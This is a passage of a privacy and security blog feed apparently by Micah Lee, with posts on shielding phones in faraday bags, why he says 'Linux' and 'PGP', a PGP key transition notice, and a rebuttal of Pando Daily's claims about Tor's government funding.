<p>So if you want to have a meeting without revealing to your attacker where this meeting is taking place (your attacker can likely infer who you’re meeting with based on what other phones are in the same location), but you don’t want to leave your phone in your hotel room, you can safely bring it with you inside a faraday bag, because your phone itself won’t be able to determine its location. It may try to, but those signals won’t penetrate the material of the bag.</p>
<p>Your phone might be spying on you in other ways, too. It has a microphone, so it could be listening to your conversations and streaming them back to your attacker over the internet, or using some other wireless technology like wifi or bluetooth. Keeping your phone in a faraday bag will prevent your phone from communicating at all.</p>
<p>But here’s an important caveat: Your phone could be listening to your conversations and storing them on disk, waiting for an internet connection. As soon as you take your phone out of your faraday bag, it can use the internet to upload recorded audio to your attacker.</p>
<p>Faraday bags block electric fields, but they don’t block sound. If you don’t want your phone to overhear a conversation, just putting it in a faraday bag isn’t enough. You also need to put it out of earshot. Put it in a different room, muffle it under some pillows, or put it in the refrigerator.</p>
Why I say Linux instead of GNU/Linux2015-09-18T00:00:00ZMicah Leeurn:uuid:2c1f1221-6fb3-37e0-931e-799dade8a3f9<p>I’ve been writing a <a href="https://theintercept.com/staff/micah-lee/">computer security column</a> for the Intercept. In most of my columns I mention Linux. Even when it’s not directly relevant (though it often is), most of my columns are in the form of tutorials, and I’d like my tutorials to be equally useful for Linux users as they are for Windows and Mac users.</p>
<p>For one thing, I love free and open source software. These projects are critical for security, privacy, and for the ability to tinker with and learn about your own computer. As the number of people who run free (as in speech) operating systems rise, so will the development resources that get poured into those operating systems until they “just work” at least as well as Windows and OS X do, so I talk about them every chance I get. Many of my readers already run free operating systems, and I would hate to leave them out.</p>
<p>After writing a column about how to <a href="https://theintercept.com/2015/07/14/communicating-secret-watched/">communicate in secret while we’re all being watched</a>, I got an email from Richard Stallman saying when I say Linux I clearly mean the GNU system, and he asked that I start referring to Linux distributions as GNU/Linux “so as to give us equal mention when you talk about our work.” And after writing my most recent column about how <a href="https://theintercept.com/2015/09/16/getting-hacked-doesnt-bad/">VMs can be used for isolation security</a>, Stallman wrote a <a href="https://theintercept.com/2015/09/16/getting-hacked-doesnt-bad/?comments=1#comment-164975">comment</a> again saying that I mean “GNU and Linux” and asking that I give GNU equal mention. This is a really common point of view (though not at all a consensus) in the free software community, and one that I shared for a long time. But I’ve come to change my mind.</p>
<p>When I talk about Linux, I’m not talking about the GNU system. I’m also not talking about a kernel. Twenty years ago GNU/Linux really was mostly the GNU system plus the Linux kernel, because GNU didn’t have its own kernel. But today when I say Linux I’m talking about something else entirely. I’m referring about the type of open source operating systems that are typically composed of the Linux kernal plus a plethora of userland projects. These usually include some of the <a href="https://www.gnu.org/software/">GNU system projects</a>, but they also include (pre-installed or in repositories) thousands of other open source projects, like desktop environments, web browsers, office software, programming languages, libraries and tools, hypervisors, server software, games, and so on and so forth.</p>
<p>“GNU/Linux” doesn’t accurately describe this type of operating system at all. A whole lot has changed since the GNU system was first developed. Of course, “Linux” doesn’t accurately describe it either, so why do I use that term?</p>
<p>Because that’s what the term means. The <a href="http://dictionary.reference.com/browse/linux?s=t">definition</a> of Linux (according to dictionary.com, though other dictionaries have similar definitions) is: “an operating system, based on UNIX, that runs on many different hardware platforms and whose source code is available to the public.” The origin of the term Linux comes from the kernel, but the colloquial definition – what normal people think when they hear and say Linux (assuming they’ve heard of it at all) – is an open source operating system. I would guess that most people who have heard of Linux, and have a general idea of what it is, have no idea what a kernel is.</p>
<p>Unfortunately for Stallman, language evolves naturally, and trying to force changes in language doesn’t always work out. If you’re looking at language <a href="https://en.wikipedia.org/wiki/Linguistic_description">descripively</a> instead of <a href="https://en.wikipedia.org/wiki/Linguistic_prescription">prescriptively</a>, Linux, not GNU/Linux, is the term that people use most of the time when referring to a Linux distribution, so that’s what that term means.</p>
<p>And I don’t mean to say that everyone should stop saying GNU/Linux in favor of Linux. The choice is yours. I’m just explaining my reasoning behind it.</p>
<p>And while I’m at it, I thought I’d explain why I use the term PGP instead of GPG. I used to only refer to PGP keys as “GPG keys” and I didn’t like using the term PGP at all because there’s a proprietary encryption product (that no one uses, and no one should use) that <a href="https://en.wikipedia.org/wiki/PGP_Corporation">used to go by the name</a>. But then, as I learned more, I realized that PGP is simply a more accurate term.</p>
<p>GPG is short of <a href="https://gnupg.org/">GnuPG</a>, a free software encryption program that complies with <a href="https://tools.ietf.org/html/rfc4880">RFC-4880</a>, which is the current technical spec that describes the <a href="https://en.wikipedia.org/wiki/Pretty_Good_Privacy#OpenPGP">OpenPGP</a> message format. When I use the term PGP, as in, “<a href="https://micahflee.com/pgp.asc">Here</a> is a copy of my PGP key,” it’s short for OpenPGP, and has nothing at all to do with the proprietary program. Many different projects comply with the OpenPGP spec, like Google’s <a href="https://github.com/google/end-to-end">End-to-End</a>, <a href="http://openpgpjs.org/">OpenPGP.js</a>, and <a href="https://pypi.python.org/pypi/pgpdump">pgpdump</a>, to name a few – and none of these share code with GPG.</p>
<p>But, most importantly, I use the terms Linux and PGP instead of GNU/Linux and GPG because that’s how people colloqually speak about these technologies. Technology is already confusing enough, and despite how cool recursive acronyms are, insisting that everyone use one piece of jargon over another piece of jargon doesn’t do anything to help people who are new at it learn and tinker.</p>
Transitioning PGP keys2015-08-17T00:00:00ZMicah Leeurn:uuid:64c8dbe2-6445-3954-9433-8ddfceb9a348<p>I’m switching from my old key:</p>
<pre><code>pub 4096R/EBA34B1C 2014-05-08 [expires: 2016-05-05]
Key fingerprint = 0B14 9192 9806 5962 5470 0155 FD72 0AD9 EBA3 4B1C
uid Micah Lee <micah@micahflee.com>
uid Micah Lee <micah@firstlook.org>
uid Micah Lee <micah.lee@firstlook.org>
uid Micah Lee <micah.lee@theintercept.com>
uid Micah Lee <micah@pressfreedomfoundation.org>
uid Micah Lee <micah@freedom.press>
sub 4096R/64B1D8D1 2014-05-08 [expires: 2016-05-05]
</code></pre>
<p>to the following key:</p>
<pre><code>pub 4096R/CD994F73 2015-08-14 [expires: 2016-08-13]
Key fingerprint = 927F 419D 7EC8 2C2F 149C 1BD1 403C 2657 CD99 4F73
uid Micah Lee <micah@micahflee.com>
uid Micah Lee <micah@freedom.press>
uid Micah Lee <micah.lee@theintercept.com>
uid Micah Lee <micah@firstlook.org>
sub 4096R/5D5F1356 2015-08-14 [expires: 2016-08-13]
</code></pre>
<p>Here’s a copy of my <a href="https://micahflee.com/gpg.asc">new public key</a>, and here’s a <a href="https://micahflee.com/wp-content/uploads/2015/08/key-transition-2015-08-17.txt.asc">key transition statement</a> that I signed with my old key.</p>
Fact-checking Pando’s smears against Tor2014-12-11T00:00:00ZMicah Leeurn:uuid:a84214fb-f4c0-37e6-99dd-2f8cb4842c53<p>If you’ve been able to ignore Pando Daily’s 100% non-technical smear campaign against the Tor Project and its developers and supporters, you’re lucky, and you may wish to stop reading now. Otherwise, read on, and perhaps prepare to lose a few brain cells.</p>
<p>Yasha Levine’s “<a href="http://pando.com/2014/07/16/tor-spooks/">investigation</a>” against Tor unveiled what’s already prominently displayed on Tor’s website: that it was designed by the Navy and that it receives a lot of federal funding, the bulk of which comes from the Department of Defense.</p>
<p>To be clear, talking about Tor’s government funding is a very important discussion to have. But Yasha didn’t discuss potential threats to Tor users’ anonymity that this funding might cause, nor what potential solutions would be. Instead, he implied that there’s some sort of conspiracy between Tor developers and the US government, and that the Tor network cannot be trusted, apparently oblivious that the decentralized and open nature of the Tor network and it’s codebase makes planting backdoors nearly impossible.</p>
<p><strong>Trolling, harassment, and spreading conspiracy theories</strong></p>
<p>Using only the fact that Tor receives federal funding, Pando has managed to rile up an anti-Tor community of Twitter trolls who insist that blatantly false things are true, like: using Tor makes it <em>easier</em> for the government to track you, that Tor is a honeytrap, that Tor developers are anti-privacy and support NSA spying, and that you can tell everything about a woman because she dyes her hair.</p>
<p>They also borrow tactics from GamerGate, including making puppet Twitter accounts to <a href="http://charon.persephoneslair.org/~andrea/pandorasts/jeremy_becker/">harrass women</a>, and to continue harassing people when they get blocked. They even started using the GamerGate-copycat hashtag #TorGate, not realizing that it kinda reinforces the sexist troll image they’re trying to deny.</p>
<p><img src="torgate.png" alt="#TorGate"></p>
<p><strong>Government funding might be the first step in exposing a scandal, but not the only step</strong></p>
<p>Throughout all of this, the Pando people (Yasha Levine, Paul Carr, and Mark Ames) and their #TorGate followers haven’t presented a shred of technical evidence against Tor’s safety. Their concerns are 100% speculation. They make the government funding point (an easy point to make since Tor prominently lists their <a href="https://www.torproject.org/about/sponsors.html.en">sponsors</a> and publishes <a href="https://www.torproject.org/about/financials.html.en">financial reports</a> for the sake of transparency), but then fail to connect any dots.</p>
<p>This is important because if they could present an actual specific concern, we can verify if their concern is real or not. The code is open, and anyone (including you) can easily run and study your own Tor nodes to confirm your suspicions.</p>
<p>Security issues with Tor get discovered all the time, and each time they get thoroughly researched (someone often ends up publishing a paper), the codebase gets patched, and Tor blogs about it to inform the public what the problem was and how it was fixed. See some recent examples <a href="https://blog.torproject.org/blog/what-spoiled-onions-paper-means-tor-users">here</a>, <a href="https://blog.torproject.org/blog/thoughts-and-concerns-about-operation-onymous">here</a>, <a href="https://blog.torproject.org/blog/advisory-remote-dos-when-using-tor-recent-openssl-versions-built-no-ssl3-option">here</a>, <a href="https://blog.torproject.org/blog/tor-security-advisory-relay-early-traffic-confirmation-attack">here</a>, <a href="https://blog.torproject.org/blog/isec-partners-conducts-tor-browser-hardening-study">here</a>, and <a href="https://blog.torproject.org/blog/quick-summary-recent-traffic-correlation-using-netflows">here</a>.</p>
<p>The #TorGate people don’t know of any problems that exist with Tor or they would articulate what they are. They’re not interested in fixing problems to make Tor safer for everyone, they’re only interested in spreading conspiracies about Tor being run by the Feds as a honeytrap to spy on activists. These accusations are quite serious considering that activists around the world literally rely on Tor for their lives. Fortunately, they’re complete nonsense.</p>
<p>When I <a href="https://twitter.com/micahflee/status/538147229228232704">asked Yasha on Twitter</a> how he would fix Tor to make it trustworthy and safe for everyone to use, the best he could come up with is to post prominent warnings on Tor’s website that says “USE AT OWN RISK” because it receives DoD grants. Keep in mind that potential answers could be: fork the project (it’s open source, after all) and build a separate onion routing network that doesn’t receive government funding; stop applying for government grants in favor of other sources of funding; etc.</p>
<p><strong>Fact checking Pando’s Tor smear</strong></p>
<p>In the faux-exposé that started all of this, “<a href="http://pando.com/2014/07/16/tor-spooks/">Almost everyone involved in developing Tor was (or is) funded by the US government</a>”, Yasha writes:</p>
<blockquote><p>Let’s start with the basics: Tor was developed, built and financed by the US military-surveillance complex. Tor’s original — and current — purpose is to cloak the online identity of government agents and informants while they are in the field: gathering intelligence, setting up sting operations, giving human intelligence assets a way to report back to their handlers — that kind of thing. This information is out there, but it’s not very well known, and it’s certainly not emphasized by those who promote it.</p>
</blockquote>
<p>Cloaking the online identity of government agents and informants is likely the reason that the DoD helps fund Tor—they depend on it as much as everyone else—but this is not the purpose of Tor.</p>
<p>The purpose of Tor is to let anybody—normal internet users, businesses with trade secrets, activists, journalists and their sources, police, and yes, the military—have an anonymous connection to the net. If an onion routing network has any hope of hiding who is using it, it needs a diversity of users, all of whom receive equal benefits of anonymity.</p>
<p>This paper by Acquisti, Dingledine, and Syverson, <a href="http://freehaven.net/doc/fc03/econymics.pdf">On the Economics of Anonymity</a>, goes into much greater detail, but here’s a quote from it that accurately describes the true purpose of Tor:</p>
<blockquote><p>Single-hop web proxies like the Anonymizer protect end users from simple threats like profile-creating websites. On the other hand, users of such commercial proxies are forced to trust them to protect traffic information. Many users, particularly large organizations, are rightly hesitant to use an anonymity infrastructure they do not control. However, on an open network such as the Internet, running one’s own system won’t work: a system that carries traffic for only one organization will not hide the traffic entering and leaving that organization. Nodes must carry traffic from others to provide cover. The only viable solution is to distribute trust. That is, each party can choose to run a node in a shared infrastructure, if its incentives are large enough to support the associated costs. Users with more modest budgets or shorter-term interest in the system also benefit from this decentralized model, because they can be confident that a few colluding nodes are unlikely to uncover their anonymity.</p>
</blockquote>
<p>In short, the diversity of users is what makes Tor work. If Tor were only built for US spies to use then anyone who sees a Tor user visit their website knows that the spies must be interested in them. Because Tor has millions of diverse users, if you see a Tor user visit your website all you know is that they’re using Tor. They could be a spy, but they could also be an activist, a hacker, or just someone who doesn’t want ad networks tracking them as they browse the web. You simply don’t know, and that’s what makes it work. Here’s an excellent overview of the diverse communities of people that benefit equally from Tor.</p>
<p>Yasha claims that: “This information is out there, but it’s not very well known, and it’s certainly not emphasized by those who promote it.” Here’s a screenshot from the front-page of Tor’s website. Notice the “Military & Law Enforcement” section.</p>
<p><img src="who-uses-tor.png" alt="Who Uses Tor"></p>
<p>Check out the prominent <a href="https://www.torproject.org/about/overview.html.en">Tor overview page</a> which begins:</p>
<blockquote><p>Tor was originally designed, implemented, and deployed as a third-generation <a href="http://www.onion-router.net/">onion routing project of the U.S. Naval Research Laboratory</a>. It was originally developed with the U.S. Navy in mind, for the primary purpose of protecting government communications. Today, it is used every day for a wide variety of purposes by normal people, the military, journalists, law enforcement officers, activists, and many others.</p>
</blockquote>
<p>The Tor Project has always been completely honest about their origin and funding. In fact, the non-profit goes further to be <a href="https://blog.torproject.org/blog/transparency-openness-and-our-2013-financials">transparent about everything it does</a>, including funding, than any other organization that I know about. If you can find any organization that is as transparent as the Tor Project, please post about it in the comments. I’m curious if one exists.</p>
<p>Continuing on with Yasha’s hit piece, he goes on to cherry-pick the military and police uses of Tor, ignoring the <a href="https://www.torproject.org/about/torusers.html.en">rest of the users</a>, and then sets the stage for conspiracy nonsense:</p>
<blockquote><p>NSA? DoD? U.S. Navy? Police surveillance? What the hell is going on? How is it possible that a privacy tool was created by the same military and intelligence agencies that it’s supposed to guard us against? Is it a ruse? A sham? A honeytrap? Maybe I’m just being too paranoid…</p>
<p>Unfortunately, this is not a tinfoil hat conspiracy theory. It is cold hard fact.</p>
</blockquote>
<p>Then Yasha goes on to explain the history of Tor, it’s military origins, how the project was open sourced and handed to EFF to manage. He quotes a 2004 EFF press release about Tor and accuses them of failing to mention that “this anonymity tool was developed primarily for military and intelligence use.” He criticizes them for focusing on its ability to protect free speech from oppressive regimes. EFF focused on this because <em>Tor can help protect free speech from oppressive regimes</em>. EFF is an non-profit law firm that’s devoted to upholding constitutional rights online. Just as the Navy supports Tor because they can use it to communicate securely, EFF supports Tor because it’s <em>a vital tool for free speech and censorship circumvention</em>. Yasha seems to be pretending that ordinary people’s privacy isn’t protected when they use Tor, which is a lie.</p>
<p>Tor is a tide that lifts all boats. When Tor was open sourced, it was no longer “developed primarily for military and intelligence use.” It was opened up under a <a href="https://www.torproject.org/docs/faq.html.en#DistributingTor">free software license</a> and given to all internet users, in all their diversity, who have owned it and relied on it ever since. It’s used by government agents, police investigating drug dealers, drug dealers trying not to get caught by police, investigative journalists, whistleblowers, and private citizens trying to browse the web privately.</p>
<p>In the end Tor does one thing: it keeps people’s IP addresses anonymous while they use the internet. This is why everyone with a vested interest in online anonymity, including the DoD (to keep their agents safe), and EFF (who’s currently suing the NSA for illegal spying), supports Tor.</p>
<p>Yasha goes on to outline Tor’s funding sources, much of them from either the DoD or the State Department.</p>
<p>I’d like to take a moment to point out that Tor’s funding model has some big problems. It’s dangerous to be too reliant on a single entity for funding—if their federal funding is cut, Tor is in trouble. And of course funders might try to influence the direction of the project and the research. In Tor’s case this is mitigated by the fact that 100% of the scientific research and source code that Tor releases is open, that the crypto math is peer-reviewed and backed up by the <a href="https://micahflee.com/2014/06/the-universe-believes-in-encryption/">laws of physics</a>, and by the fact that the Tor Project itself doesn’t run the network—the network is diverse and decentralized, run by volunteers all over the world (me included). It would be excellent if there were a way for Tor to get weaned off DoD funding and replace the bulk of it with some other source. And I’m sure they would be interested in doing this, if other sources of money made themselves available.</p>
<p>Personally I prefer that Tor gets the funding it needs to continue its groundbreaking anonymity research and to continue to improve its product and the stability of its network. I rely on it on a daily basis to do my work in journalism and source protection safely and securely. It would be great to have a real conversation about this without Pando’s baseless conspiracy theories.</p>
<p>In the section “How safe is Tor, really?”, Yasha points out that traffic correlation attacks exist, and that Tor isn’t safe against global adversaries (which are both likely-unsolvable low-latency onion routing problems that have been outlined in Tor’s <a href="https://svn.torproject.org/svn/projects/design-paper/tor-design.pdf">design document</a> since at least 2004). Tor has done more research on these issues than anyone else, and the latest version of Tor is the state-of-the-art technology in this area, but it will probably never be perfect, because it’s probably not possible for it to be perfect.</p>
<p>In his hit piece, Yasha lists some examples of Tor failing to protect people:</p>
<ul>
<li>The Harvard kid who was the only Tor user on Harvard’s network at the time that he sent his bomb threat.</li>
<li>The Freedom Hosting and Silk Road hacks (problems with the web apps that were hosted as Tor hidden services, not with Tor itself).</li>
<li>Exit node sniffing (an issue with people using plaintext protocols on the internet; people are just as vulnerable when using airport wifi, though perhaps they’re less likely to have an attacker on their network than to be using a malicious exit node).</li>
</ul>
<p>These sort of things happen a lot, and they will continue to happen a lot. Like plane crashes, we can study and learn from them each time to make them less likely to happen in the future. Tor continues to improve, and to make these attacks harder, more expensive, or impossible to pull off.</p>
<p>For example, when FBI hacked Freedom Hosting servers and started attacking visitors’ Tor Browsers with javascript exploits, they only attacked old versions of Tor Browser (based on an old Firefox exploit) because new versions weren’t vulnerable. The major problem there was that people weren’t upgrading their software. Now Tor Browser doesn’t just warn you when your browser is out-of-date, it will automatically upgrade it for you too. Next time a Freedom Hosting-style attack happens, no one will be running an outdated Tor Browser.</p>
<p>This doesn’t mean that it’s dangerous to use Tor, especially if you pay attention to the <a href="https://www.torproject.org/download/download-easy.html.en#warning">list of things to pay attention to</a> that all Tor users see when they download Tor Browser, and again when they open Tor Browser. It certainly doesn’t mean that Tor is a honeytrap.</p>
<p>Yasha references Snowden documents (2.5 years old at this point) about NSA’s attempts to attack Tor. Of course, he didn’t mention the slide that confirms that (at least 2.5 years ago) NSA wasn’t a global adversary, and therefore couldn’t easily deanonymize Tor users by connecting the routing dots. We’ve learned a lot about NSA’s almost omnipotent capabilities from the Snowden leaks, and this slide gave me great hope that we still have a fighting chance at privacy.</p>
<p><img src="tor-stinks.png" alt="Tor Stinks"></p>
<p>He states that: “Tor co-founder Roger Dingledine revealed that the Tor Network is configured to prioritize speed and route traffic through through the fastest servers/nodes available,” as if this were a secret, and Roger weren’t discussing it in order to figure out how to solve the problem of the trade-off between circuit diversity and speed.</p>
<p>It’s important to know that simply running high bandwidth nodes doesn’t mean you’re malicious. Unless you’re an exit node, 100% of the traffic that travels through your node is encrypted. If you are an exit node, then you can only easily spy on plaintext traffic, e.g. you can see HTTP traffic but you can’t see HTTPS traffic—the same as a normal network attacker on open wifi. And unless you control both the entry and exit nodes in a single circuit (much of the arms race right now is focused on making this impossible), you can’t deanonymize anyone. Tor is built this way by design.</p>
<p>Finally, Yasha ends his the article with Edward Snowden and the fact that he ran some high-bandwidth Tor nodes, as if this was a bad or sketchy thing for him to do. Running Tor nodes is an excellent thing to do for anyone who cares as much about internet freedom and privacy as Snowden does to contribute to the movement.</p>
<p><strong>Pando is not a credible news source</strong></p>
<p>Investigative journalism is incredibly important, even when the target of the investigation is an organization like the Tor Project. Following the money is a great way to begin discovering corruption. Pando’s reporting about Tor is not investigative journalism. They set out to attack Tor, found that it gets lots of government funding, and wrote a story about that, pretending that that’s the same thing as Tor being malicious.</p>
<p>If there were some sort of document, like an email or a contract, that shows that a Tor developer was doing something malicious on behalf of the government, that would be a huge piece of investigative journalism. If there were evidence of an intentional design flaw in the Tor network, similar to NSA’s sabotage of encryption standards through their <a href="https://en.wikipedia.org/wiki/Bullrun_(decryption_program">BULLRUN</a>) program, that would be a huge deal. Pando didn’t find anything that wasn’t published on torproject.org.</p>
<p>Who knows Pando’s true motives—most likely, they’re doing it for the traffic by stirring up controversy, like a tabloid. But regardless of the intentions, they’re certainly attacking one of the most important privacy tools in our collective toolbag. Nothing good will come from people who truly need Tor, such as whistleblowers and dissidents, believing Pando’s nonsense.</p>
<p>Luckily, I don’t think that’s likely to happen.</p>